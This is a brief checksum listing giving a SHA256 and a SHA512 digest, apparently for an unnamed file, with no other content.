SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63